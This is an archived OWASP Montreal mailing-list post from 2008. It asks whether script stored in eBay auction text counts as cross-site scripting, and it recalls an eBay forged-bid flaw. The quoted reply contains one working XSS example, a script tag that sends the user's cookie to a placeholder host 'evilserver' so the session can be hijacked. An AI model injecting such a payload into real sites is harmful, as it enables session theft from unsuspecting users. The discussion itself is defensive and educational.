[ OWASP - Montreal ] Confusion about XSS...

Benoit Guerette benoit.guerette at gmail.com
Wed Dec 17 15:21:12 EST 2008


In fact, in 2004, Ebay had a XSRF vulnerability, allowing
authenticated members to call a forged bid request to an 'attacker'
auction;  the forged bid was hidden inside an img tags within the
auction description... I saw the word "On Site request forgery" about
this.

So I was looking if a "On Site Scripting" vuln exist... Quite confusing...



On Wed, Dec 17, 2008 at 2:13 PM, Sean Coates <sean at caedmon.net> wrote:
> Am I wrong, or to be declared as XSS vuln. the script must be injected from
> an external source, not the site itself?
>
> What if ebay allow html script tags in the auction text, is it an XSS? If
> not how do you call this? The site is the source...
>
> "Watch for sale. <script
> type="text/javascript">document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>"
>
> This script would send the authenticated user cookie to the attacker,
> allowing session hijacking.
>
> I would consider that a form of cross site scripting, even if it's not
> technically "cross site." eBay definitely should be filtering that out...
> think "Samy is my hero."
> This is where HtmlPurifier serves well (-:
> S
>



-- 
http://www.linkedin.com/in/benoitguerette
http://www.owasp.org/index.php/Montreal


More information about the Owasp-montreal mailing list